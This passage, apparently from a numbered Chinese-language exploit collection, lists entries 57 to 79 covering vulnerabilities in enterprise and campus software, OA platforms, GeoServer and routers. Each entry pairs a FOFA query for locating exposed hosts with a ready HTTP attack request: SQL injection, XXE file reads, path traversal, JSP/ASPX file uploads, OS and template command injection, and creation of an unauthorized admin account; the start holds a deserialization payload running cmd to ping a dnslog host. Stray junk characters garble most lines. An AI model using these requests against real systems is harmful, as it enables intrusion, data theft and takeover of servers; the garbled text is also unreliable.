6 n- I6 i* u- m% ^ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 t4 c' i0 U' |! L4 Y8 \4 H
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"' W& X1 ~' r& u
}
" `" n7 N4 i7 n2 E% O, r$ A) t% y }6 g9 Z8 K0 z; x
}
/ q% u. l+ B# a4 K; ^}+ [( n) C2 G$ P& S
' s4 Y$ v4 V0 J0 B' u- V
: l1 {! K& N" g9 V& z5 c0 Z0 G- g57. 畅捷通T+ keyEdit.aspx SQL注入
) t( @& C* O0 A" o+ sFOFA:app="畅捷通-TPlus"
- \5 D5 q( _3 {5 }$ P( |7 N& IGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1+ r1 e! k2 j$ i3 j! n, k4 V
Host: host$ C, {# ~' W) N9 Y6 L8 b% w& R
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. O3 q/ _. ?: v7 d! U: y& Q5 `
Accept-Charset: utf-84 w% A* i- m+ l
Accept-Encoding: gzip, deflate K" h1 s* p7 V8 }/ L% Q2 s
Connection: close1 M a: O6 b. f: @6 B
; y! T. M* X9 \+ `) l R2 q
1 @/ ?; b! D1 Z58. 畅捷通T+ KeyInfoList.aspx sql注入
e1 @' T- y. ^: q+ ]FOFA:app="畅捷通-TPlus"0 M: g" X/ U) k J/ ~# r
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
8 f6 K* G3 i" G' u5 ?4 V* uHost: your-ip! V% H: |, K- ?# t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.369 X0 S: \, R0 a+ d4 ~% J: u
Accept-Charset: utf-8
6 `3 m8 K$ a7 x9 c4 S/ S' `Accept-Encoding: gzip, deflate5 V: T; |3 [0 Y' y0 m' e* O
Connection: close& ^5 f6 X- B, x
! f6 N6 a, W3 G. b* B0 \
! H# e/ ^! ~% N- \$ X4 f9 ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% n) \! `% O+ ]FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
" B7 {( y- e( O2 ~1 j2 { j2 ^POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
W D- G, L f3 _% H+ eHost: 192.168.86.128:9090# I% K8 f# f" [" p
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36% } b, i/ F% z4 c( S1 M+ v* U4 ^
Connection: close; h h, H9 u; U$ p. X1 |
Content-Length: 1669
2 I$ a; M2 J6 \0 BAccept: */*
: i3 Y1 `9 q3 D* I8 K7 pAccept-Language: en# e+ X' R! S, } ~" c7 ], k0 [ y
Content-Type: application/x-www-form-urlencoded1 c4 t+ p2 }, z0 ?2 _$ f
Accept-Encoding: gzip
. M4 i* T4 u1 v S! S9 g$ C, N6 E( E5 ]+ S& n$ s
PAYLOAD
2 f+ i( F K2 Z3 l7 J/ s7 i0 [! g! m( A4 J" L" n
; w3 u$ n7 h4 }' y60. 百卓Smart管理平台 importexport.php SQL注入2 j) }+ l- E5 z; Y
FOFA:title="Smart管理平台"
$ W* D$ r0 C$ l9 h- `- L! gGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1 w6 n- C' j- E7 \% E
Host:
2 c7 w' L1 k( N) G: X5 o& dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. T m# H" X* \, e- IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" Y* _; \9 k# ]. a, {6 s9 }
Accept-Encoding: gzip, deflate
9 {/ g3 m, d8 B# eAccept-Language: zh-CN,zh;q=0.9' S3 N; M3 s: i% |
Connection: close4 L- y" T" e( `6 [" K
3 ] X) b+ O6 p/ b! M
) }1 K6 i$ P+ I: j! x3 g
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传1 y) e" P5 T f- N, W
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
5 D! O+ B! A# v. Z V* c$ N* XPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
' L% \) N7 n. [3 VHost: x.x.x.x
4 V# t3 }) _; y3 K6 M/ f; A, |& FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 m! B/ I% c+ s$ S% I
Connection: close/ t" c+ q. `+ u1 |$ N
Content-Length: 27
5 [; v, H# y6 l# e8 MAccept: */*
' R4 q( w; M7 g( K% oAccept-Encoding: gzip, deflate
6 O$ p9 i7 w& S5 P# S7 X' m9 }Accept-Language: en* ?' K# u$ z$ n* V5 A4 ]( q/ ~
Content-Type: application/x-www-form-urlencoded
9 w1 \1 A2 L( S U# z9 q
& \* C, o# e7 Y& f8uxssX66eqrqtKObcVa0kid98xa
- q- b8 d$ ?5 @
6 `+ J0 k' m* z1 F0 @/ B2 X6 T/ J* j8 q1 d
62. IP-guard WebServer 远程命令执行* O1 J* B0 d9 ?% E
FOFA:"IP-guard" && icon_hash="2030860561"7 n" @( G1 q& V2 I" I+ F) J
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1$ [) W, C2 C( H8 w
Host: x.x.x.x( R- @( S5 D( Y
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36' a" _( I# n$ r; s! l: X0 U
Connection: close1 @4 i) h) f4 y+ I1 N
Accept: */** Y' e9 _. L7 `3 Y& ?9 T$ B
Accept-Language: en3 O5 }. ]" l' J! u! i
Accept-Encoding: gzip7 i% x7 M* m* z3 }* w+ K6 F
- {8 C) C4 ?- j: @ Q* y- _" d7 X. B! q$ m8 i; H
访问2 Y2 @. z& |. v
+ l. C; O. A7 e; tGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 H# x+ U. [1 `' h8 {
Host: x.x.x.x# s% W/ }7 w9 f J8 S
) _( o6 J9 ]' a4 W( n( h8 [2 v
0 } h; Y3 H" i% B2 {! o
63. IP-guard WebServer任意文件读取5 l z4 K9 w/ B( F" f
IP-guard < 4.82.0609.0
4 b& r6 o4 L& A+ qFOFA:icon_hash="2030860561"
4 X; |7 h g6 Y; X% V! i: m: KPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.16 p( G1 }& u; b) F( a$ V @, O2 g/ K
Host: your-ip
' x( }7 `3 z/ t( B0 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ }1 q. C' ]1 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ?9 Z9 n: i2 B& g3 h- P' n6 _% {Accept-Encoding: gzip, deflate
* k% {( r$ V6 Y# |0 D3 `) r% }Accept-Language: zh-CN,zh;q=0.9
! ?1 J: I/ h" j- {% BConnection: close0 g3 K" e) [6 D0 \
Content-Type: application/x-www-form-urlencoded
3 }' y& B L/ z! [) t z* o9 k% J1 R/ |8 O4 u# ^/ y5 t
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
+ K; a9 Y4 \1 c, ^
+ e8 @! t- U" w! y64. 捷诚管理信息系统CWSFinanceCommon SQL注入+ x1 t( ~: t- {" Y' u" T: g$ D; ?
FOFA:body="/Scripts/EnjoyMsg.js"
; f1 y' o3 R2 S! PPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.15 v, P4 k9 s. N8 J3 e5 o' Y
Host: 192.168.86.128:9001
$ s* E8 q5 \/ f3 m6 xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# n- i* M0 O# _Connection: close6 J9 K0 g* C) ]2 ?
Content-Length: 369
4 J3 \ c: ~1 V, r5 TAccept: */*
* ^5 C& V( J7 n. j, mAccept-Language: en2 Z1 q& v* w2 g- c
Content-Type: text/xml; charset=utf-8: A% ] t6 y. O A3 B; P3 B
Accept-Encoding: gzip" U, q) B2 W/ h; b2 l& d9 a
2 P9 O# o5 F* R5 i0 T% f7 a' e
<?xml version="1.0" encoding="utf-8"?>1 X; P' Y5 d" L: z. D
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! e4 ?4 p! S P+ q2 {: y<soap:Body>/ w) P- o' H* z
<GetOSpById xmlns="http://tempuri.org/">, i- i6 p6 Q' h. T
<sId>1';waitfor delay '0:0:5'--+</sId>
, w- x, z5 a, T: [1 L2 { </GetOSpById>0 d! M$ C. d$ k4 [
</soap:Body>5 p( w& p$ I* \
</soap:Envelope>
5 F& @3 [: M2 H: i1 r, d$ z! l. T! q; j# x! I6 T. l- y8 b; V% X; M ]
4 x9 Z, o% k8 e
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" L1 G2 l' A0 V) j
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台") ] ?9 q% `0 ]' i8 @9 R
响应200即成功创建账号test123456/123456; o) h U. i& \. Q4 H: Y5 F
POST /SystemMng.ashx HTTP/1.1
D# G t: m* G! m) G5 ]* ^& fHost:- P4 A; q1 k0 W& S3 w' k
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
7 h% v7 X5 M3 j& I" v( m7 B. }Accept-Encoding: gzip, deflate
$ Y1 h( ]* @1 h6 o: p" LAccept: */*
) Z- g- w, g9 Q; f! V5 @/ cConnection: close
5 n3 J* t4 @' GAccept-Language: en
7 A2 w8 ~' I8 [& L( SContent-Length: 1742 V/ l! y% H e! Z; c2 K7 n" E
3 B6 @/ n; p' J& k3 A' v' l {. coperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
- E0 |6 ~, U: U8 Z; w( j6 ]7 [- U$ K1 b" x0 ?8 `5 \
! y% `& B( t& o2 m; j66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
) l: M3 N+ S' R. P( @2 F% |/ mFOFA:app="万户ezOFFICE协同管理平台"
" Y) O- u$ _( Z" B; H0 h) D0 O' G G# Q$ V
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1! B2 i; ^0 Q4 c- A: E
Host: x.x.x.x! v) h4 Z/ Z4 T5 z( s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! f4 Z+ @) I0 ^8 k5 a
Connection: close
( S6 ^3 S& Z) a5 ^ K2 SAccept: */*
8 F' g$ O2 r9 x, g! OAccept-Language: en
; {' W) O- s% ?, X# U1 h' iAccept-Encoding: gzip
6 c i( a+ [' d9 E f8 o- E1 n( D- o# V! P% m
: M; j! ?/ ^' }3 S2 J
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在& g+ w! A6 T9 y+ i0 v
/ v0 I0 j! S0 K& R67. 万户ezOFFICE wpsservlet任意文件上传
/ L. l) ~8 Y$ ~$ I5 G% @FOFA:app="万户网络-ezOFFICE"0 E8 ~& m2 D- M$ K8 i
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型+ W$ x" c- g. |
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
9 s" x3 f( Z3 \2 q3 PHost: x.x.x.x
3 Y# l; L b$ T3 O' D$ t2 {5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0) J' X: o# h% D3 U7 ~! x8 r8 k' P
Content-Length: 173( \: Z2 y, S( X8 G2 s3 @% F2 m& ~& B" K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 n. n5 ?2 f* r' K6 M7 JAccept-Encoding: gzip, deflate
- s) K Q- h/ ZAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.36 T1 ^* Q" l) j
Connection: close
! |, v0 N0 E! j+ z) P; aContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp0 z/ g- I/ t& W- o; _$ h: p% C2 |
DNT: 1+ q( y3 U+ f( v
Upgrade-Insecure-Requests: 12 ~7 ]0 p' T9 B K6 T6 `
% s4 h, @8 C( q--ufuadpxathqvxfqnuyuqaozvseiueerp
# q2 y/ i- [2 i3 ~# CContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp": [# |6 t/ J# L4 W
9 G8 c3 C! d& z/ R<% out.print("sasdfghjkj");%>
9 l5 _3 u3 r6 @( x! G! j4 o--ufuadpxathqvxfqnuyuqaozvseiueerp--/ P8 m+ J3 q& F2 D* T; G
1 K b8 e. n5 W. ^
, A& \6 D! n# x7 d1 n文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
. A" u+ _. k8 W W/ b
2 O8 o5 v* [4 J4 z S' x68. 万户ezOFFICE wf_printnum.jsp SQL注入
@3 o/ q" ~0 H4 a7 V$ a8 IFOFA:app="万户ezOFFICE协同管理平台"& d2 r- B) P$ }: j0 }! U
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.18 V' K# `1 U) G- f1 K% C5 Y
Host: {{host}}! _( D9 g& d1 C v# c8 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
' {! H6 W# y8 Z. X' g$ s; MAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ ]/ U3 y) D2 ]. qAccept-Encoding: gzip, deflate
a6 K/ }6 d6 xAccept-Language: zh-CN,zh;q=0.93 Q7 ?( U! \" ?
Connection: close. O, k" V$ y1 [9 B) g3 m
5 y5 K. ?' X# I7 L `9 E! W6 N
2 s6 ?# k( ^2 Q* c3 h, ]69. 万户 ezOFFICE contract_gd.jsp SQL注入+ v$ x7 s9 J! s4 c: {4 v1 g% E( E
FOFA:app="万户ezOFFICE协同管理平台"
3 O# p" m& [" x& u! ~GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
' I, q0 D2 H# D/ p% r( L) P, ?Host: your-ip1 c, c# Z. h2 R: H( d' J2 m
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" N5 _; x9 M& [* a) C
Accept-Encoding: gzip, deflate
3 g* @! H, W6 P( SAccept: */*) U; j; z$ F. X P1 p
Connection: keep-alive% q7 m& {, _5 J
, e' f u6 l9 X" n0 {3 {" n! s; e7 w( g& t) l
70. 万户ezEIP success 命令执行; N. }0 k3 o$ q) E1 K* H9 \- L
FOFA:app="万户网络-ezEIP"" v: ?1 E5 u3 P6 R! t N6 Y; n# z
POST /member/success.aspx HTTP/1.1( ]" }' Y8 Q1 y9 L
Host: {{Hostname}}' f2 \" V2 g6 w$ r# `( ~& ?$ }' z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, y. x* @/ N3 ?6 i1 x# f6 T
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
4 p6 e$ V7 J5 PContent-Type: application/x-www-form-urlencoded
& N4 E2 C+ \7 J: C, ~; STYPE: C
- u+ k1 o* |& e3 j( b! P9 w' XContent-Length: 16702
1 v) y- D0 e H X) |7 d! S) f( a1 f7 R$ q
__VIEWSTATE=PAYLOAD8 c! {4 x. n. ~6 C3 l' P# E
6 h8 D& Q! {- [# k9 n* O7 ^5 \3 Y B3 F
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
+ }: W* V- B! n3 N& mFOFA:body="PM2项目管理系统BS版增强工具.zip"
" u7 {- x( M8 r3 N$ B7 _ _2 {GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
% e& K+ V6 k4 s' n O0 b+ g* MHost: x.x.x.xx.x.x.x- H) x8 K+ l4 B- Z8 P3 G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" e/ B8 N( R7 o0 B+ z& |1 c# P
Connection: close
' m G9 I( F: T4 U- qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 T3 y7 P, C$ W s+ l* IAccept-Encoding: gzip, deflate
! c+ U, \' _: \& k4 n. eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* {6 _1 l- i2 O$ |" T1 RUpgrade-Insecure-Requests: 1
$ x8 z" @ X3 [* T, k
4 V* ?) j, R2 `2 W3 I5 O4 ^" S3 w+ [; Y! u: v: z, v
72. 致远OA getAjaxDataServlet XXE
' j0 Q7 L5 @0 d3 T) cFOFA:app="致远互联-OA"4 J8 z L1 L( A) S' F
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.15 n4 k5 m8 ^% M+ T5 p3 ?6 H
Host: 192.168.40.131:8099
0 \+ B3 W+ }/ j, {' W( Y6 rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 V4 S4 e9 B& e& i* y3 y) L+ c
Connection: close( s% |# _4 s8 S! f/ p
Content-Length: 5835 _; X. J. g V4 e( K
Content-Type: application/x-www-form-urlencoded
( H" {# a! j' Y6 l: D7 _Accept-Encoding: gzip
6 ^ U' L, l1 z* O( z
7 u: N/ U+ Z9 |6 FS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
D5 m0 O+ \9 x
) H7 l& R- j/ x( K" `$ M
6 [0 m( f J! G( `. g1 X73. GeoServer wms远程代码执行
. [4 ]2 M \1 v1 C- O, kFOFA:icon_hash=”97540678”
4 z' Z3 V# _9 ?/ \POST /geoserver/wms HTTP/1.1
. H- [, G9 m* r/ F( Y8 jHost:
8 p. k: E! m- I: M& B& p; m" m& OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. L: m+ C4 J; g1 l. u% Z M2 O
Content-Length: 19817 V2 U- H. F3 I$ U
Accept-Encoding: gzip, deflate
3 |2 F: ^7 e4 \+ _Connection: close' ?) @. g1 ?6 A2 S
Content-Type: application/xml
9 A# [( e7 P* @5 r8 O; HSL-CE-SUID: 3
- M& \/ m [1 J1 H8 C, `; f1 E9 E7 S9 C3 B8 z- S$ t8 Y. `
PAYLOAD
& l/ O3 U6 Y( O# M' N, `
8 s# Z% ], K) r4 h2 a
5 |% A# K& @2 K6 r2 p! A74. 致远M3-server 6_1sp1 反序列化RCE
0 u/ C- y4 p9 u0 @FOFA:title="M3-Server") l. Y6 i. C9 e+ M
PAYLOAD* R/ Y) a0 s8 t
1 x8 b5 K, b7 u# U9 ~7 W; C
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
& X* X1 A1 O" _7 Q# L. u* C4 U0 [FOFA:app="TELESQUARE-TLR-2005KSH"
* \4 W5 G& b& A4 s$ @" ?1 c! w$ gGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
' A) L+ o1 W) C1 C3 R- gHost: x.x.x.x- I( ?6 @3 N5 `5 Z' F* c0 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 {3 q1 m1 h& U: D- W6 u9 G
Connection: close
2 \- Q# Z9 j2 ]+ \Accept: */*
4 X; d6 _4 i. b" {. _Accept-Language: en
& U' f8 V- b; T$ V5 b( e- v( NAccept-Encoding: gzip
; U7 U9 K) K$ @. r5 m# z8 A: [ ]1 Y
5 E! Q, M" M( f% _! a. Z7 y5 R% W" r' D1 P$ _; f% `1 W* H
GET /cgi-bin/test28256.txt HTTP/1.1
" M% \) |$ {; O8 } NHost: x.x.x.x
7 v |6 p0 Q+ T1 e4 \' c; w; e/ G+ x$ P; z1 o
" V" p1 \4 e; s$ E3 Y+ I" w76. 新开普掌上校园服务管理平台service.action远程命令执行. |1 l7 j; q0 R; M) s. K. w+ C. R
FOFA:title="掌上校园服务管理平台"
' Y" _( T+ C: w3 `% X/ {- L0 [POST /service_transport/service.action HTTP/1.1. B/ \! i( c2 o i6 r) G3 L. s2 g
Host: x.x.x.x
( `1 h! d" Z. P( F( I$ y! T# \2 }0 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0* V- ~( `! a) J$ L
Connection: close2 ]" J% n, i6 [' r/ _6 Z0 X
Content-Length: 211( i7 z& ^( {. a1 C8 O8 E7 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ a+ m# v, [8 \% m7 \& V
Accept-Encoding: gzip, deflate
& n2 \7 @. E/ T$ l7 |; \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 D+ n6 D& Q4 D) |" G* a) `Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A48 g; ^! H: K, e8 H3 }# A
Upgrade-Insecure-Requests: 1
% K! G8 E, L3 A0 V, ?7 i/ D8 X) Y }% H) e+ t
{/ G+ O8 I* |( L& Y O3 }2 _4 y
"command": "GetFZinfo",) z" S* b& M, }4 Y+ `5 r0 ]
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"$ C6 G& S# I# W. C
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
6 N# I2 F2 T; t3 V}& J& e/ o a* _# [& A# A
! k8 C" _6 {" \- F" f' c" d5 |+ w& q4 @4 B) P1 l. E7 x/ z
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.15 P( y3 }- v+ z- @5 X( w: R8 `
Host: x.x.x.x; o7 A! {8 Y4 T9 ?9 w; Z8 X; R c
2 }" L! {. C. A( L& P
% V0 r4 z9 F, S# P
' g* Y0 u! g2 C& l5 `
77. F22服装管理软件系统UploadHandler.ashx任意文件上传 B6 U* t: \% w: S0 U- u
FOFA:body="F22WEB登陆"/ N6 q, [/ A% E6 ?1 Z7 X5 \3 A1 F
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
; E+ v' r* ~. {0 v, [. nHost: x.x.x.x3 Y0 T# N# G L& b7 f# U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% Y/ _( D& M8 u7 {5 c1 o1 hConnection: close" C. s3 J' ]9 j! G( T
Content-Length: 4337 a) n& r3 m9 l/ ?5 ?- F
Accept: */*
& o, K1 T, c7 U3 H( yAccept-Encoding: gzip, deflate
" g W+ a7 `5 }' \# C& m. HAccept-Language: zh-CN,zh;q=0.9! V- K4 k1 w$ \) Q
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix2 Y0 {6 Q9 Q4 P; } A
7 G8 X, f* X% w K& C/ l Y
------------398jnjVTTlDVXHlE7yYnfwBoix5 Z/ u h0 Z. i1 Z7 a- O
Content-Disposition: form-data; name="folder"
- }6 N, J/ V* e8 s
8 w6 }0 O$ K7 P; f0 S5 D. w/upload/udplog) a1 p" \( q, o: U+ v2 E0 c
------------398jnjVTTlDVXHlE7yYnfwBoix
' s/ f0 y2 q# ?8 n8 IContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
2 h5 v, R3 j V- M$ hContent-Type: application/octet-stream! Q( T! G& q# l e2 P$ `
6 \7 r7 A' u( Q' ?, Y" mhello12345673 F* W) d3 z4 u+ O7 W
------------398jnjVTTlDVXHlE7yYnfwBoix
" N, {# r" |5 I! Y/ l, H ?Content-Disposition: form-data; name="Upload"
8 x+ o3 Q/ d/ N3 b& {" J9 @' M' u
! k. z5 j: _# x3 m. A) ySubmit Query( ]6 N; U' t( ]( m# y% G' y. W4 t* N
------------398jnjVTTlDVXHlE7yYnfwBoix--
9 t* F4 W2 h" n2 e+ S0 ^" @
5 j% O. v% m5 l; ~% J" X0 H, u& y' S& N3 [
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
! B( ~1 ^- P4 T h% `FOFA:icon_hash="2001627082"% \, m# D4 ^9 C6 v
POST /Platform/System/FileUpload.ashx HTTP/1.1# P7 O/ ^! B2 F2 K8 ~/ W
Host: x.x.x.x
1 Y3 W! m+ t# |: DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" Z% [2 D1 p- _. ?& RConnection: close; X# T+ G" Q) _/ Q; y. t9 o, `$ X# k6 r
Content-Length: 336
& M& }* _7 A: D9 d) I- uAccept-Encoding: gzip* |( D5 ~+ K1 y6 r" E# h) A
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
* a0 Q4 }! \, g( x9 G" B K: \# ]( E. S5 i0 V3 l
------YsOxWxSvj1KyZow1PTsh98fdu6l2 p& P( \% t( h6 q1 Q/ E
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt") `: Z( ^/ ~0 e, d( x7 b
Content-Type: image/png# b( ]; w: e% n1 F& L6 U
) w E: s$ B o/ ?: v9 b* x) kYsOxWxSvj1KyZow1PTsh98fdu6l
/ K7 ^# M$ B6 B2 e$ ~/ z------YsOxWxSvj1KyZow1PTsh98fdu6l
& q. z: V& e+ z7 r- q; pContent-Disposition: form-data; name="target"
* K1 L2 T; C3 X( i: _7 B$ N- ^) E
8 F6 \ H9 B3 [+ h x/ _* d! h3 y/Applications/SkillDevelopAndEHS/
* _% M3 I. D8 H9 C. ~------YsOxWxSvj1KyZow1PTsh98fdu6l--
3 W& s& a& O* {0 G" c1 Z
2 `& ]% ?4 }, R" t. W+ W b/ h# r8 }6 j
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1$ a6 K; Q5 I) c F
Host: x.x.x.x; F5 M* Y+ R! e1 i$ j% d2 b
4 T& m' z& t& |! i2 ]# N }/ T, G# B7 O
79. BYTEVALUE 百为流控路由器远程命令执行# T: F0 G5 Q2 }3 V
FOFA:BYTEVALUE 智能流控路由器, J; N. v8 B2 G6 ^9 P
GET /goform/webRead/open/?path=|id HTTP/1.14 a8 W% q8 `! w
Host:IP
